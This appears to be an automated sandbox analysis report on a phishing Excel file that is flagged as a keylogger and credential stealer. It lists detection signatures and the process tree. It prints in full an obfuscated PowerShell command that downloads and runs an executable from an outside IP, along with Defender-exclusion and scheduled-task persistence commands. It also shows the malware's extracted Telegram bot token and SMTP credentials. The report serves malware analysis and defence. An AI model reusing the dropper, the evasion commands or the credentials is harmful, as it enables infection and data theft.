Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
Analysis ID:1492413
MD5:d35618eec168e30e2a2df672f612388c
SHA1:7637c3d56066f932e38de4918c5a3756791491e2
SHA256:bd980fb1f921bf16d88b62d519ed6adb057ffc3c93532fca6465fac9e7074123
Tags:xlsx
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Yara detected MalDoc
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 2480 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 2040 cmdline: "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3096 cmdline: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3312 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3328 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D56.tmp" "c:\Users\user\AppData\Local\Temp\d1xzy0xm\CSCCF15997BD6B546CEB43AF983F4CD5CA2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • sihost.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Roaming\sihost.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
            • powershell.exe (PID: 3472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • schtasks.exe (PID: 3488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmp8AF2.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
            • sihost.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Roaming\sihost.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
    • AcroRd32.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 3940 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
  • taskeng.exe (PID: 3636 cmdline: taskeng.exe {6C210698-E638-4D51-B8D8-9F29DBC70A32} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • bKVNuVuE.exe (PID: 3712 cmdline: C:\Users\user\AppData\Roaming\bKVNuVuE.exe MD5: D02CC222E09FD373FAF4030AC735618C)
      • powershell.exe (PID: 3780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3816 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bKVNuVuE" /XML "C:\Users\user\AppData\Local\Temp\tmpA3FD.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • bKVNuVuE.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
      • bKVNuVuE.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
      • bKVNuVuE.exe (PID: 3556 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
      • bKVNuVuE.exe (PID: 3504 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
      • bKVNuVuE.exe (PID: 3560 cmdline: "C:\Users\user\AppData\Roaming\bKVNuVuE.exe" MD5: D02CC222E09FD373FAF4030AC735618C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}
{"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "yUiavQX8", "Password": "us2.smtp.mailhostbox.com", "Host": "favourcloning@gmail.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxJoeSecurity_MalDoc_4Yara detected MalDocJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.460456249.0000000003699000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000C.00000002.455899860.00000000004D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 19 entries
              SourceRuleDescriptionAuthorStrings
              12.2.sihost.exe.3699550.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                12.2.sihost.exe.3699550.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  12.2.sihost.exe.4d0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    12.2.sihost.exe.4d0000.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      12.2.sihost.exe.43da760.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                        Click to see the 25 entries

                        System Summary

                        barindex
                        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1208, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\40[1].hta
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Roaming\sihost.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ParentImage: C:\Users\user\AppData\Roaming\sihost.exe, ParentProcessId: 3408, ParentProcessName: sihost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bKVNuVuE.exe", ProcessId: 3472, ProcessName: powershell.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICA
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 2480, ProcessName: mshta.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\sihost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sihost.exe, NewProcessName: C:\Users\user\AppData\Roaming\sihost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\sihost.exe, ParentCommandLine: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sihost.exe" , ProcessId: 3408, ProcessName: sihost.exe
                        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\sihost.exe, ProcessId: 3408, TargetFilename: C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWERShELL.eXE -Ex bYPasS -nOP -W 1 -c DevIcECRedENTIaLdePlOYmENT.EXE ; ieX($(IEX('[SyStEm.TEXT.eNcODinG]'+[char]58+[cHaR]0x3a+'UTf8.gEtsTriNG([sYSTeM.COnVErT]'+[cHar]58+[CHAr]0X3A+'FrOMbaSE64stRING('+[chAr]0x22+'JFQyNWd0Zm90RXVTICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlRmlOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0NsdUJFTW8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0lVLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUdqRCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZVnZGVnlSdE4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsa3lrV0RleGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUMjVndGZvdEV1Uzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xMzgvNDAvc2lob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO1N0YVJULVNMZUVwKDMpO1N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHNpaG9zdC5leGUi'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3096, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d1xzy0xm\d1xzy0xm.cmdline", ProcessId: 3312, ProcessName: csc.exe
